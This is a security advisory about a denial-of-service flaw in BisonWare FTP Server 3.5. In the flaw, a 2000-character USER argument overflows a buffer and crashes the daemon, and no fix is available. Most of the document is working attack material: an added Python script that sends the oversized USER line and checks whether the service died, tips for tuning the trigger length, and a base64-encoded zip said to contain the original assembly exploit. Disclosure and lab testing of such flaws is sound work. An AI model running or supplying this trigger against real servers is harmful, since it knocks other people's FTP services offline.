COMMAND

    BisonWare FTP Server

SYSTEMS AFFECTED

    BisonWare FTP Server V3.5

PROBLEM

    UssrLabs found a local/remote DoS attack against BisonWare FTP Server
    V3.5: a user name of 2000 characters, sent as the argument of the USER
    command on the control connection, overflows a fixed-size buffer  and
    brings the server down.  The advisory claims only a crash, not  code
    execution.  There is not much to expand on; it is a simple hole.  For
    details go to:

        http://www.ussrback.com/biftps35/
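    The script below is an added example, not the USSR Labs tool attached
    further down (that one is written in assembly).  It does the same job
    in Python: open a control connection, send a USER line whose argument
    is 2000 bytes long, and then open a fresh connection to see whether
    the daemon is still answering, since a dropped connection alone is not
    a denial of service.  The host, port and "A" filler are assumptions
    for a lab box; the 2000-byte length is the figure from the advisory.

```python
"""Trigger check for the BisonWare FTP 3.5 long-USER crash.

Added example, not the USSR Labs tool from the advisory.  Host and port
below are assumptions for a lab instance; never point this at a server
you do not own, because a successful run takes the service down.
"""
import socket

TARGET_HOST = "127.0.0.1"   # assumption: a lab instance of BisonWare FTP 3.5
TARGET_PORT = 21
USERNAME_LENGTH = 2000      # the length given in the advisory


def build_user_command(length=USERNAME_LENGTH, fill=b"A"):
    """Return the raw FTP control line: 'USER ' + <length> filler bytes + CRLF."""
    if length < 0 or len(fill) != 1:
        raise ValueError("length must be >= 0 and fill must be a single byte")
    return b"USER " + fill * length + b"\r\n"


def read_reply(sock):
    """Read one chunk of server output; b'' means the peer closed, reset, or timed out."""
    try:
        return sock.recv(4096)
    except OSError:   # ConnectionResetError and socket.timeout are both OSError
        return b""


def send_long_user(host=TARGET_HOST, port=TARGET_PORT,
                   length=USERNAME_LENGTH, timeout=5.0):
    """Send the oversized USER line and report what happened on that connection."""
    result = {"banner": b"", "reply": b"", "connection_dropped": False}
    with socket.create_connection((host, port), timeout=timeout) as sock:
        result["banner"] = read_reply(sock)          # the 220 greeting
        sock.sendall(build_user_command(length))
        result["reply"] = read_reply(sock)           # 331 if it survived, b'' if not
        result["connection_dropped"] = result["reply"] == b""
    return result


def service_alive(host=TARGET_HOST, port=TARGET_PORT, timeout=3.0):
    """Fresh connection after the trigger: does the daemon still greet us?

    This is the actual DoS check.  False means nobody is listening any more
    (or the listener accepts but never sends a banner).
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            return read_reply(sock).startswith(b"220")
    except OSError:
        return False


if __name__ == "__main__":
    before = service_alive()
    print("service answering before test:", before)
    if before:
        outcome = send_long_user()
        print("banner:", outcome["banner"].strip())
        print("reply to long USER:",
              outcome["reply"].strip() or b"<none, connection dropped>")
        print("service answering after test:", service_alive())
```

    Run it once against the lab instance and compare the two service_alive()
    results; if the second is False the server died on the long user name.
    The advisory gives 2000 as the length that triggers the overflow, but
    that is an upper bound from the original tool, not a measured minimum;
    lowering the length parameter on repeated runs finds the real threshold.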

    Below is the exploit source, a MIME/base64-encoded zip archive holding
    MY.ASM, MAKE.BAT and CODE.INC:

    ---
    Content-Type: application/octet-stream; name="diebif35.zip"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="diebif35.zip"
    Content-MD5: paijGG8iCrB5mPxCu3Aybg==
    
    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
    BwAAAAA=
    
    -----

SOLUTION

    No fix is available yet.  The vendor has been contacted.